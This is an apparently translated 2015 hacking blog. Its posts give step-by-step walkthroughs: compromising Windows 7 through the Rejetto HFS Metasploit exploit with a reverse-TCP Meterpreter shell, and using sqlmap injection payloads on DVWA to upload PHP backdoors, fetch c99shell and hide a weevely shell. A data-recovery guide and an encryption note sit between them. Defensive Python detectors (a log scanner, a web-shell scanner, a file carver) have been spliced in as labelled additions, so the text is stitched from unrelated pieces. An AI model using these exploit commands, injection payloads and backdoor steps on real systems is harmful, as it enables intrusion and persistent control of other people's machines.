Sunday, 06 September 2015

HOW TO HACK WINDOWS 7

1 OPEN TERMINAL

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) >


3 set PAYLOAD windows/meterpreter/reverse_tcp
show options

 
4 msf exploit(rejetto_hfs_exec) > set RHOST 192.168.1.102   (target IP)
RHOST => 192.168.1.102

5 msf exploit(rejetto_hfs_exec) > set SRVHOST 192.168.1.110   (our IP)
SRVHOST => 192.168.1.110

 
6 msf exploit(rejetto_hfs_exec) > set LHOST 192.168.1.110
LHOST => 192.168.1.110

 
7 msf exploit(rejetto_hfs_exec) > set LPORT 4444
LPORT => 4444

8 msf exploit(rejetto_hfs_exec) > exploit

 
9 meterpreter > shell
Process 3180 created.
Channel 2 created.
 
10 Next, list the directory:

meterpreter > ls
Listing: C:\Users\monyonk\Desktop
=================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2015-09-06 22:26:18 +0700 %TEMP%
100666/rw-rw-rw- 26125 fil 2015-09-02 20:50:05 +0700 Generate-Macro.ps1
100666/rw-rw-rw- 1436 fil 2015-09-02 21:13:02 +0700 RegistryCleanup.ps1
100666/rw-rw-rw- 171 fil 2015-09-02 21:11:47 +0700 SchTaskCleanup.ps1
40777/rwxrwxrwx 0 dir 2015-08-27 17:52:27 +0700 darkcomet 5.3.1
100666/rw-rw-rw- 282 fil 2014-12-30 01:27:27 +0700 desktop.ini
40777/rwxrwxrwx 0 dir 2015-09-06 22:08:57 +0700 egy.txt
40777/rwxrwxrwx 0 dir 2015-09-06 22:09:15 +0700 egywashere
40777/rwxrwxrwx 0 dir 2015-09-06 22:12:49 +0700 egyyyyyy
100777/rwxrwxrwx 2498560 fil 2014-08-24 21:18:36 +0700 hfs.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:13:20 +0700 ijinmassayasdhmasuk
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:42 +0700 koramil.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:41 +0700 reky

11 Create a new directory (the post calls it a "file"; mkdir creates a directory)

meterpreter > mkdir jagotarung.exe
Creating directory: jagotarung.exe
 
12 meterpreter > ls
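The listing in step 10 is also a useful hunting artifact for whoever defends that desktop: directories named like executables (koramil.exe, and the jagotarung.exe created in step 11), world-writable PowerShell scripts on a user's desktop, a file-server binary (hfs.exe) on a workstation, and a folder carrying the name of a known RAT (DarkComet). The Python below is an added example, not code from the original post or from Metasploit: it parses a listing in exactly the format meterpreter prints and flags such entries. The sample listing is constructed from the entries shown on the page; the flagging rules are my own, not a published ruleset.

```python
import re
from dataclasses import dataclass

# Sample listing, constructed from the entries the post shows (same format meterpreter prints).
SAMPLE_LISTING = """\
Listing: C:\\Users\\monyonk\\Desktop
=================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2015-09-06 22:26:18 +0700 %TEMP%
100666/rw-rw-rw- 26125 fil 2015-09-02 20:50:05 +0700 Generate-Macro.ps1
100666/rw-rw-rw- 1436 fil 2015-09-02 21:13:02 +0700 RegistryCleanup.ps1
40777/rwxrwxrwx 0 dir 2015-08-27 17:52:27 +0700 darkcomet 5.3.1
100666/rw-rw-rw- 282 fil 2014-12-30 01:27:27 +0700 desktop.ini
100777/rwxrwxrwx 2498560 fil 2014-08-24 21:18:36 +0700 hfs.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:42 +0700 koramil.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:41 +0700 reky
"""

# One entry line: mode, size, type, "YYYY-MM-DD HH:MM:SS +ZZZZ", then a name that may contain spaces.
ENTRY_RE = re.compile(
    r"^(?P<mode>\d+/[rwx-]{9})\s+(?P<size>\d+)\s+(?P<type>dir|fil)\s+"
    r"(?P<mtime>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})\s+(?P<name>.+)$"
)

@dataclass
class Entry:
    mode: str
    size: int
    type: str
    mtime: str
    name: str

def parse_listing(text):
    """Parse meterpreter 'ls' output; header and separator lines simply fail the regex and are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            d = m.groupdict()
            entries.append(Entry(d["mode"], int(d["size"]), d["type"], d["mtime"], d["name"]))
    return entries

EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd")
SCRIPT_EXT = (".ps1", ".vbs", ".js", ".hta")
NAME_WATCHLIST = ("darkcomet",)   # hypothetical watchlist; DarkComet is a well-known RAT family

def flag_entries(entries):
    """Return {name: [reasons]} for entries a responder would want to look at first."""
    findings = {}
    for e in entries:
        reasons = []
        lower = e.name.lower()
        if e.type == "dir" and lower.endswith(EXEC_EXT):
            reasons.append("directory named like an executable")
        if e.type == "fil" and lower.endswith(SCRIPT_EXT):
            reasons.append("script file on user desktop")
        if e.type == "fil" and lower.endswith(EXEC_EXT) and e.mode.endswith("rwxrwxrwx"):
            reasons.append("world-writable executable")
        if any(w in lower for w in NAME_WATCHLIST):
            reasons.append("name on watchlist")
        if reasons:
            findings[e.name] = reasons
    return findings

def review(text):
    """Parse and flag in one call; returns the findings dict."""
    return flag_entries(parse_listing(text))

if __name__ == "__main__":
    for name, reasons in review(SAMPLE_LISTING).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run stand-alone it prints one line per flagged entry; `reky`, `desktop.ini` and `%TEMP%` produce nothing, which is the point of keeping the rules narrow.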

Saturday, 05 September 2015

DATA RECOVERY (RECOVERING / SEARCHING FOR ENCRYPTED DATA)

DIGITAL FORENSICS
1     IDENTIFICATION
2     PRESERVATION
    - chain of custody
    - labeling
    - imaging/clone (making a copy of it)

3     EXAMINATION (testing)
4     ANALYSIS
5     REPORTING/PRODUCT
                                     APPLICATIONS COMMONLY USED
                                         a. TestDisk
                                         b. Autopsy (usually opened in a browser).

┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #apt-get install testdisk
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
testdisk
0 upgraded, 1 newly installed, 0 to remove and 151 not upgraded.
Need to get 394 kB of archives.
After this operation, 1,419 kB of additional disk space will be used.
Get:1 http://eu.repository.frozenbox.org/mirrors/debian/ jessie/main testdisk i386 6.14-3+b2 [394 kB]
Fetched 394 kB in 3s (104 kB/s)
Selecting previously unselected package testdisk.
(Reading database ... 269039 files and directories currently installed.)
Preparing to unpack .../testdisk_6.14-3+b2_i386.deb ...
Unpacking testdisk (6.14-3+b2) ...
Processing triggers for man-db (2.7.0.2-5) ...
Setting up testdisk (6.14-3+b2) ...

 
┌─[root@parrot]─[/home/budhya]
└──╼ #testdisk /dev/sdb
TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org
The disk is the one named TOSHIBA; select it and press ENTER.
 Next select the Intel partition table type and press ENTER.
 Next select ANALYSE and press ENTER.
 Next select QUICK SEARCH and press ENTER.
 Next select CONTINUE and press ENTER.
 Next press P (list files) to look for your file in the directory.
 Entries shown in RED in a directory are the deleted files; this is the target file. Select it and press C to copy the red file.
 Next select the destination and confirm the copy; when the copy is done the entry is listed in GREEN.
 Then look on your PC for the destination where the file was pasted after the copy; once you find it there, the recovery is finished.
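The procedure above works because a deleted file's bytes normally stay on the disk until something overwrites them: TestDisk finds them through leftover filesystem metadata, while signature carving (the approach of its companion tool PhotoRec) scans the raw image for known file headers and trailers. The Python below is an added example, not part of the original notes and not TestDisk code: it builds a small constructed "disk image" containing a valid 1x1 PNG and a JPEG-shaped blob between filler bytes, hashes the image before and after the work (the preservation step from point 2: the evidence must not change), and carves both files back out by signature. The image layout and both embedded files are constructed for the demonstration.

```python
import hashlib
import os
import struct
import tempfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PNG_END = b"IEND\xaeB`\x82"      # zero-length IEND chunk plus its fixed CRC
JPEG_SOI = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"

def sha256_file(path, block=1 << 20):
    """Hash a file in blocks; the same value before and after proves the image was not altered."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(block), b""):
            h.update(chunk)
    return h.hexdigest()

def png_chunk(kind, data):
    """Build one PNG chunk: length, type, data, CRC32 over type+data."""
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", zlib.crc32(kind + data) & 0xFFFFFFFF)

def make_sample_png():
    """A valid 1x1 RGB PNG (constructed sample evidence)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00\xff\x00\x00")              # one scanline: filter byte + one red pixel
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")

def make_sample_jpeg():
    """A JPEG-shaped blob: SOI + APP0 marker + padding + EOI (constructed; not a decodable picture)."""
    return JPEG_SOI + b"\xe0\x00\x10JFIF\x00" + b"\x01" * 64 + JPEG_EOI

def build_sample_image(path):
    """Write a constructed raw image: filler, PNG, filler, JPEG, zero padding. Returns both embedded files."""
    png, jpg = make_sample_png(), make_sample_jpeg()
    filler = b"FREE SPACE " * 32
    with open(path, "wb") as f:
        f.write(filler + png + filler + jpg + b"\x00" * 512)
    return png, jpg

def carve(image_path):
    """Scan the raw image for PNG/JPEG signatures; return [(offset, kind, bytes)] in disk order."""
    with open(image_path, "rb") as f:
        data = f.read()
    found, pos = [], 0
    while True:
        cands = []
        for kind, hdr in (("png", PNG_SIG), ("jpeg", JPEG_SOI)):
            p = data.find(hdr, pos)
            if p != -1:
                cands.append((p, kind, hdr))
        if not cands:
            break
        start, kind, hdr = min(cands)                 # earliest header wins
        trailer = PNG_END if kind == "png" else JPEG_EOI
        end = data.find(trailer, start + len(hdr))
        if end == -1:                                 # header without trailer: skip it and keep scanning
            pos = start + 1
            continue
        end += len(trailer)
        found.append((start, kind, data[start:end]))
        pos = end                                     # never re-scan inside a carved file
    return found

def run_demo():
    """End to end: write image, hash, carve, re-hash. Returns a summary a test can check."""
    with tempfile.TemporaryDirectory() as tmp:
        image = os.path.join(tmp, "evidence.img")
        png, jpg = build_sample_image(image)
        before = sha256_file(image)
        carved = carve(image)
        after = sha256_file(image)
        return {
            "hash_unchanged": before == after,
            "kinds": [k for _, k, _ in carved],
            "png_ok": any(k == "png" and b == png for _, k, b in carved),
            "jpeg_ok": any(k == "jpeg" and b == jpg for _, k, b in carved),
        }

if __name__ == "__main__":
    print(run_demo())
```

The carver opens the image read-only and the hash comparison confirms it; on a real case the same rule applies to the TestDisk session, which is why the notes insist on imaging before examination.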

Friday, 04 September 2015

DISK AND MESSAGE/EMAIL ENCRYPTION WITH THUNDERBIRD AND VERACRYPT

Open a terminal to look at the disks in your PC and type:

1  └──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #fdisk -l

 Open the VeraCrypt application.
 Next run the application and search for the partition you want to make private.
 Next select your target private partition.
 Next click OK.
 Then Next.
 Enter your password for the private partition.
 Finished: your partition is hidden.


NEXT, PRIVATE EMAIL: open the Thunderbird application
and start the setup now.
==>> next search for key generation in the console;
this makes email encryption simple.
Next, the key IDs for your friends' email addresses..

Thursday, 03 September 2015

EXPLOIT DVWA AND UPLOAD A HIDDEN BACKDOOR

1.target.go.id/idex.php?id_berita=12&
Open terminal..

1.1 ┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                 

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

┌─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l simple.txt
         _
open new terminal

┌─[✗]─[root@parrot]─[/home/budhya]

└──╼ #cd /usr/share/webshells/php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #


└──╼ #ls
findsock.c  php-backdoor.php  php-findsock-shell.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

Next, copy the file to the home directory:
└──╼ #cp php-backdoor.php ~
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #
Next, check that the copy finished:
┌─[root@parrot]─[~]
└──╼ #pwd
/root
┌─[root@parrot]─[~]
└──╼ #ls
12 hari kmaren  Desktop          maltego_3.6.1.6748-0kali2_all.deb  New Graph (1).mtgx  sessions          Videos
9844.py         Documents        MaltegoChlorineCE.3.6.0.6640.deb   New Graph (2).mtgx  Templates         VirtualBox VMs
abuy.php        Downloads        Metasploitable2-Linux              php-backdoor.php    tmp.php           vpngate_vpn239494852.opengw.net_udp_1947.ovpn
abuy.py         HARI 8           Music                              Pictures            TUGAS MLAM INI .  vpngate_vpn800695980.opengw.net_udp_1605.ovpn
blackhat.jpg    malam ini tugas  NewFolder                          Public              ub 10.04.vdi      Wireles hacking
┌─[root@parrot]─[~]
└──╼ #

Next step: upload the backdoor
┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l /home/budhya/dvwaheader.txt -p "id" --file-write=/root/php-backdoor.php --file-dest=/www/dvwa/hackable/uploads/abouy.php
         _
If the backdoor has been uploaded successfully, a notification appears in the terminal:

Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=gdyvv' AND (SELECT 2276 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (CASE WHEN (2276=2276) THEN 1 ELSE 0 END)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GfHD'='GfHD&Submit=Submit


    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=gdyvv' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x426b64424b7872745956,0x7176707171)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=gdyvv' AND (SELECT * FROM (SELECT(SLEEP(5)))vTIN) AND 'qWtS'='qWtS&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n]
[22:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[22:01:48] [INFO] fingerprinting the back-end DBMS operating system
[22:01:49] [WARNING] reflective value(s) found and filtering out
[22:01:49] [INFO] the back-end DBMS operating system is Linux
[22:01:49] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file '/root/php-backdoor.php' has been successfully written on the back-end DBMS file system (/var/www/dvwa/hackable/uploads/abouy.php)? [Y/n]
[22:01:50] [INFO] the remote file /var/www/dvwa/hackable/uploads/abouy.php is larger than the local file /root/php-backdoor.php
[22:01:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09032015_1001pm.csv'
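The sqlmap output above is also what the attack looks like from the server side: each of those payloads arrives in the `id` GET parameter and lands in the web server's access log, which is where a defender should be able to find it afterwards. The Python below is an added example, not code from the original post or from sqlmap: it parses Apache combined-format lines, URL-decodes every query parameter, and classifies values against the three payload classes sqlmap reported (error-based via FLOOR(RAND()*2) with GROUP BY, UNION-based, and time-based via SLEEP), plus a generic quote-then-AND/OR check. The log lines are constructed from the page's own payloads using the DVWA SQLi page path, encoded the way a client would send them, with one benign request for contrast.

```python
import re
from urllib.parse import urlencode, urlsplit, parse_qsl

# The three injected values are taken from the sqlmap output on the page.
PAYLOADS = [
    "gdyvv' AND (SELECT 2276 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (CASE WHEN (2276=2276) "
    "THEN 1 ELSE 0 END)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
    "AND 'GfHD'='GfHD",
    "gdyvv' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x426b64424b7872745956,0x7176707171)#",
    "gdyvv' AND (SELECT * FROM (SELECT(SLEEP(5)))vTIN) AND 'qWtS'='qWtS",
]

def make_log_line(ip, ts, id_value):
    """Constructed Apache combined-format line; the query is encoded exactly as a client would send it."""
    query = urlencode({"id": id_value, "Submit": "Submit"})
    return (f'{ip} - - [{ts}] "GET /dvwa/vulnerabilities/sqli/?{query} HTTP/1.1" '
            f'200 4870 "-" "Mozilla/5.0"')

SAMPLE_LOG = [
    make_log_line("192.168.1.110", "03/Sep/2015:22:01:48 +0700", PAYLOADS[0]),
    make_log_line("192.168.1.110", "03/Sep/2015:22:01:48 +0700", PAYLOADS[1]),
    make_log_line("192.168.1.110", "03/Sep/2015:22:01:49 +0700", PAYLOADS[2]),
    make_log_line("192.168.1.50", "03/Sep/2015:22:05:10 +0700", "1"),   # benign request
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule matches one payload class on the decoded parameter value.
RULES = {
    "error-based":   re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "union-based":   re.compile(r"UNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based":    re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(|WAITFOR\s+DELAY", re.I),
    "quote-boolean": re.compile(r"'\s*(?:AND|OR)\s+", re.I),
}

def decoded_params(target):
    """Split the request target and return decoded (name, value) pairs; '+' and %XX are both handled."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def classify(value):
    """Names of every rule the value triggers, in RULES order; empty for ordinary input."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def scan_log(lines):
    """One finding per (request, parameter) that carries an injection-looking value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in decoded_params(m["target"]):
            hits = classify(value)
            if hits:
                findings.append({"ip": m["ip"], "time": m["time"], "param": name, "classes": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} param={f['param']} {', '.join(f['classes'])}")
```

Decoding before matching matters: the same payload with `%27` for the quote and `+` for spaces would slip past a rule applied to the raw line. The time-based rule is the one worth alerting on even at low volume, because a SLEEP(5) that is never followed by a UNION is still a working blind injection.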

Next, the backdoor upload is processed.

Then the backdoor upload is finished.


Next, find the uploaded backdoor in DVWA and run it.
Search for the name of the uploaded backdoor;
 in this simple example the uploaded backdoor is named abuy.
 Next type touch and press Enter, then ls to view the directory.

For this backdoor you create a new backdoor: from
http://www.r57shell.net/ download the backdoor named c99shell, then extract it here and open it.

Next, once the download is finished, extract it here, rename it, and upload the backdoor again in DVWA.


After opening and extracting, rename the file (my sample is renamed to jagotarung.php); the upload of backdoor 2 is then finished and you browse to
 http://192.168.1.123/dvwa/jagotarung.php
Next you must delete backdoor 1, for the safety of backdoor 2:
hackable, upload, then tick it, With selected: delete, confirm.


Next, a simple edit in the HTML: the name WELCOME is renamed to FOR JAGO TARUNG.
Next, hide your backdoor for safety.
Open a new terminal and type:
┌─[root@parrot]─[/home/budhya]
└──╼ # weevely generate 12345 tarung.php
Then press Enter; if it succeeds the following appears:
[generate.php] Backdoor file 'tarung.php' created with password '12345'

 ┌─[root@parrot]─[/home/budhya]
└──╼ #cat tarung.php
<?php
Next, copy the file contents (the block shown in the image)
and paste them into the editor of the DVWA backdoor.
Next SAVE, and look in the terminal.
Copy the URL and type in the terminal:
http://192.168.1.123/dvwa/index.php 12345 (12345 is the password)
If you want to look for your hidden file, type ls ....... finished.
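The defender's counterpart to the steps above, for whoever administers the DVWA host: a file such as abouy.php, jagotarung.php or tarung.php sitting in hackable/uploads is exactly what a periodic scan of the upload directory should catch. The Python below is an added example, not code from the original post, from weevely or from any of the shells named: it walks an upload directory, reports any file with an extension the PHP interpreter would execute regardless of its content, and separately scores file contents for the functions and decoding patterns PHP web shells rely on, so that a shell renamed to an image extension is still caught. The sample files are constructed stand-ins that carry the indicators without doing anything; the indicator list and weights are my own.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled web server may execute; an upload directory should hold none of these.
EXEC_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".inc"}

# Content indicators as (regex, weight). Ordinary uploads (images, documents) match none of them.
INDICATORS = [
    (re.compile(rb"<\?php"), 2),
    (re.compile(rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I), 3),
    (re.compile(rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 2),
    (re.compile(rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)\s*\["), 1),
    (re.compile(rb"\$[a-z_]\w*\s*\(\s*\$"), 2),   # variable function call: $f($x)
]

def score_file(path, read_limit=1 << 20):
    """Score the first read_limit bytes of a file; returns (score, [patterns that hit])."""
    with open(path, "rb") as f:
        data = f.read(read_limit)
    score, hits = 0, []
    for rx, weight in INDICATORS:
        if rx.search(data):
            score += weight
            hits.append(rx.pattern.decode())
    return score, hits

def scan_uploads(root, threshold=4):
    """Return sorted [(relative path, [reasons])]: executable extension, or indicator score >= threshold."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            score, hits = score_file(path)
            reasons = []
            if ext in EXEC_EXT:
                reasons.append(f"server-executable extension {ext}")
            if score >= threshold:
                reasons.append(f"web shell indicators (score {score}): {', '.join(hits)}")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

# Constructed sample upload directory. None of these files does anything when run.
SAMPLE_FILES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64,
    "notes.txt": b"meeting notes, nothing executable here",
    # stand-in for an uploaded PHP file: the shape of a shell, no behaviour; caught by extension alone
    "abouy.php": b"<?php\n// stand-in: reads a parameter and prints a constant\n$cmd = $_REQUEST['c'];\necho 'ok';\n",
    # PHP-looking content hidden behind an image extension; caught by content scoring
    "picture.gif": b"GIF89a\n<?php $data = base64_decode($_POST['payload']); echo strlen($data); ?>",
}

def run_demo():
    """Write the constructed samples to a temp directory, scan it, return {relpath: reasons}."""
    with tempfile.TemporaryDirectory() as root:
        for name, content in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(content)
        return dict(scan_uploads(root))

if __name__ == "__main__":
    for path, reasons in run_demo().items():
        print(f"{path}: {'; '.join(reasons)}")
```

The extension rule runs first and unconditionally: an obfuscated shell (weevely's output is encoded precisely so that content signatures miss it) may score nothing, but it still needs a server-executable extension to be reached, and an upload directory has no legitimate reason to contain one. The content score exists for the other direction, a PHP file disguised as an image, which only becomes dangerous if the server is later tricked into interpreting it.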